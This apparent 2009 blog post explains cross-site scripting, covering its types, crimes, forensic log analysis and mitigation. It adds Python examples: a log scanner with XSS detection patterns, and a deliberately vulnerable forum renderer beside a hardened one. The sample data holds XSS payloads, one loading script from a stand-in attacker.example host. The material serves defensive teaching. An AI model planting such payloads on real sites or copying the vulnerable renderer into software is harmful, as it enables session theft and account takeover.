Thursday, April 23, 2009

XSS Attacks

Cross Site Scripting (XSS)

Cross Site Scripting is a type of computer security vulnerability in which a malicious third party uses code injection and encoding techniques to exploit a given web site, harvest confidential data, facilitate phishing, or execute scripts on clients' machines. [i] One of the major issues with cross site scripting is that the end user is often unaware of the attack. (Rafail)[ii] The abbreviation XSS is used because CSS is easily confused with Cascading Style Sheets.

There are many types of XSS attacks:

Simple Persistent (Hope et al)[iii]
DOM-Based (Klein et al)[iv]
Non-Persistent[v]
Persistent[vi]
Identity Based (session cookie theft and impersonation)

Beyond these named types, any web portal that accepts dynamic content which other users may later see, or that relies on a database back-end (message boards, forums, online sales listing sites and so on), may be vulnerable to an XSS attack. XSS attacks typically use a browser-supported scripting language in combination with HTML to harvest user information or session cookies, and the gathered information is then used elsewhere. An XSS attack also has the added feature of bypassing most corporate security systems such as firewalls, and, if the site hosting the XSS attack is encrypted with TLS/SSL, proxies as well.


Crimes

Crimes that may leverage XSS include fraud (session hijacking of an online banking transaction), defamation or slander (impersonating a public figure and posting to a hate-related web site), and identity theft or unauthorized access to public and private systems via a browser exploit. Initial estimates place around 70% of web sites that allow user input as vulnerable. (Berinato)[vii]

Investigation Techniques

Techniques for investigating XSS do exist and include the standard methods of computer forensics; however, since all XSS attacks involve web sites with dynamically generated content that is non-local and dynamically linked to the exploit, the investigation techniques used must cover databases, code analysis and general HTML. (Shiuh-Jeng et al)[viii] The most common forensic technique used for XSS exploits is log file analysis. The procedure is to locate the victims of the XSS attack and analyse their systems, locate the server hosting the attack, and from that server locate the malicious server hosting the code of the attack; that server is then analysed to develop a suspect profile, which also determines where else the same attack may have been used on the primary site. Depending on the severity of the damage caused, the police may seize all assets involved to determine the origin and mitigate any further damage. (Shiuh-Jeng et al)[ix]
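The log file analysis step described above, as an added example that is not part of the original post: a small Python scanner over web server access logs in Apache "combined" format. It URL-decodes each query parameter, flags values carrying script markup, and pulls out any external host referenced in the flagged value, which is the "malicious server hosting the code" the investigator next wants to locate. The log lines, IP addresses and the attacker.example host are constructed for the example; the indicator patterns are deliberately narrow and illustrate the approach rather than a complete rule set.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample lines in Apache "combined" log format (not real traffic).
# Two requests carry script markup in a query parameter; the rest are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Apr/2009:10:01:12 +0000] "GET /forum/search?q=laptop HTTP/1.1" 200 5123 "http://shop.example/forum" "Mozilla/5.0"
198.51.100.7 - - [23/Apr/2009:10:02:45 +0000] "GET /forum/search?q=%3Cscript%20src%3D%22http%3A%2F%2Fattacker.example%2Fc.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 5201 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Apr/2009:10:03:10 +0000] "POST /forum/post HTTP/1.1" 302 0 "http://shop.example/forum/new" "Mozilla/5.0"
192.0.2.9 - - [23/Apr/2009:10:05:00 +0000] "GET /forum/thread/42?hl=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 7310 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Apr/2009:10:06:30 +0000] "GET /forum/thread/42 HTTP/1.1" 200 7310 "http://shop.example/forum" "Mozilla/5.0"
"""

# One combined-format line: client IP, timestamp, request line, status, size, referer, agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Indicators of script injection in a decoded parameter value (illustrative, not exhaustive).
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
}
# Absolute URLs inside a payload point at the server hosting the attack code.
EXTERNAL_URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def decoded_params(target):
    """(name, value) pairs from the query string; parse_qsl decodes once and
    unquote_plus decodes a second time so double-encoded payloads are not missed."""
    query = urlsplit(target).query
    return [(k, unquote_plus(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def scan_log(text):
    """Flag every request whose decoded query parameters match an indicator."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in decoded_params(rec["target"]):
            hits = [label for label, rx in INDICATORS.items() if rx.search(value)]
            if not hits:
                continue
            hosts = {urlsplit(u).hostname for u in EXTERNAL_URL_RE.findall(value)}
            findings.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "param": name,
                "indicators": hits,
                "external_hosts": sorted(h for h in hosts if h),
            })
    return findings


def profile_by_source(findings):
    """Group findings by client IP: the starting point for a suspect profile."""
    by_ip = defaultdict(list)
    for f in findings:
        by_ip[f["ip"]].append(f)
    return dict(by_ip)


if __name__ == "__main__":
    for ip, items in profile_by_source(scan_log(SAMPLE_LOG)).items():
        for f in items:
            print(ip, f["time"], f["param"], f["indicators"], f["external_hosts"])
```

Run on a real access log, the same scan gives a timeline per source address and a list of third-party hosts to pivot to; the POST in the sample shows why stored (persistent) XSS also needs the application's database examined, since the injected body never appears in the query string.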

Mitigation

Mitigating cross-site scripting attacks requires action by the web user and their browser in addition to testing and engineering by the web site developer: just as firewalls have become the de facto standard for defending against unwanted network traffic, XSS filters attached to web browsers have become standard in all popular web browsers. Conducting input validation tests on web sites that expect to host forums or content management software also mitigates the potential for XSS exploits.
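The developer-side mitigation above, as an added example that is not code from the original post: a forum post renderer written twice in Python, first concatenating raw user input (the mistake that creates both reflected and stored XSS), then with allowlist input validation on the username and HTML encoding of every value at output time. Output encoding goes one step beyond the input validation the post names; it is what makes the stored body harmless regardless of what the validator let through. The sample posts, usernames and the attacker.example host are constructed for the example.

```python
import html
import re

# Constructed sample posts (not from any real site). The second carries a script
# injection in the body; the third carries one in the username.
SAMPLE_POSTS = [
    {"user": "alice", "body": "Great price on this laptop!"},
    {"user": "mallory", "body": '<script src="http://attacker.example/c.js"></script>'},
    {"user": "bob<img src=x onerror=alert(1)>", "body": '5 < 10 & "quotes" are fine'},
]

# Allowlist for usernames: letters, digits and underscore only (assumed site policy).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def render_post_vulnerable(post):
    """Build HTML by pasting raw user input into the page: the XSS mistake.
    The username lands inside an attribute and the body inside element content,
    and neither is encoded, so either can break out of its context."""
    return '<div class="post" data-user="' + post["user"] + '">' + post["body"] + "</div>"


def validate_username(user):
    """Input validation: reject anything outside the allowlisted character set."""
    return bool(USERNAME_RE.match(user))


def render_post_hardened(post):
    """Validate on input, then HTML-encode on output for the context each value lands in.
    html.escape(quote=True) encodes & < > " and ', so a value can neither close the
    surrounding attribute nor open a new tag."""
    if not validate_username(post["user"]):
        raise ValueError("invalid username")
    user = html.escape(post["user"], quote=True)
    body = html.escape(post["body"], quote=True)
    return f'<div class="post" data-user="{user}">{body}</div>'


def contains_active_markup(rendered):
    """Crude check used only to show the difference between the two renderers:
    does the output still contain a live script tag or event handler attribute?"""
    return bool(re.search(r"<\s*script\b|\bon[a-z]+\s*=", rendered, re.I))


if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print("vulnerable:", render_post_vulnerable(post))
        try:
            print("hardened:  ", render_post_hardened(post))
        except ValueError as err:
            print("hardened:   rejected on input:", err)
```

The hardened renderer rejects the third post outright (validation) and turns the second into inert text (encoding); in a real application the same encoding has to be chosen per context, since a value placed inside a script block or a URL needs a different encoder than one placed in element content.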

References

[i] N.a. (CGISecurity, March 2008) The Cross Site Scripting FAQ [Online] World Wide Web, Available from: http://www.cgisecurity.com/xss-faq.html (Accessed on April 24th 2009)

[ii] Rafail, Jason (CERT Coordination Center, Carnegie Mellon University, 2001) Cross Site Scripting Vulnerabilities [Online] PDF Document, Available from: http://www.cert.org/archive/pdf/cross_site_scripting.pdf (Accessed on April 24th 2009)

[iii] Hope, Paco; Walther, Ben (O’Reilly Media Inc, 2008) Web Security Testing Cookbook, p. 128, ISBN 978-0-596-51483-9

[iv] Klein, Almit (Web Application Security Consortium, July 4th 2005) DOM Based Cross Site Scripting or XSS of the Third Kind [Online] World Wide Web, Available from: http://www.webappsec.org/projects/articles/071105.shtml (Accessed on April 24th 2009)

[v] N.a. (Web Application Security Consortium, 2005) Threat Classification [Online] World Wide Web, Available from: http://www.webappsec.org/projects/threat/classes/cross-site_scripting.shtml (Accessed on April 24th 2009)

[vi] N.a. (Web Application Security Consortium, 2005) Threat Classification [Online] World Wide Web, Available from: http://www.webappsec.org/projects/threat/classes/cross-site_scripting.shtml (Accessed on April 24th 2009)

[vii] Berinato, Scott (CSO, January 1st 2007) Software Vulnerability Disclosure: The Chilling Effect [Online] World Wide Web, Available from: http://www.csoonline.com/article/221113/Software_Vulnerability_Disclosure_The_Chilling_Effect?page=7 (Accessed on April 24th 2009)

[viii] Shiuh-Jeng Wang; Yao-Han Chang; Wen-Ya Chiang; Wen-Shenq Juang (IEEE, FGCN 2007) Investigations in Cross-site Script on Web-systems Gathering Digital Evidence against Cyber-Intrusions [Online] PDF Document, Available from: http://ieeexplore.ieee.org/Xplore/login.jsp?url=http%3A%2F%2Fieeexplore.ieee.org%2Fiel5%2F4426076%2F4426188%2F04426216.pdf%3Farnumber%3D4426216&authDecision=-203 (Accessed on April 24th 2009)

[ix] Shiuh-Jeng Wang; Yao-Han Chang; Hung-Jui Ke; Wen-Shenq Juang (Taiwan Central Police University, Shih Hsin University, December 9th 2007) Digital Evidence Seizure in Network Intrusions against Cyber-crime on Internet Systems [Online] PDF Document, Available from: http://dspace.lib.fcu.edu.tw/bitstream/2377/11011/1/JOC_18_4_7.pdf (Accessed on April 24th 2009)
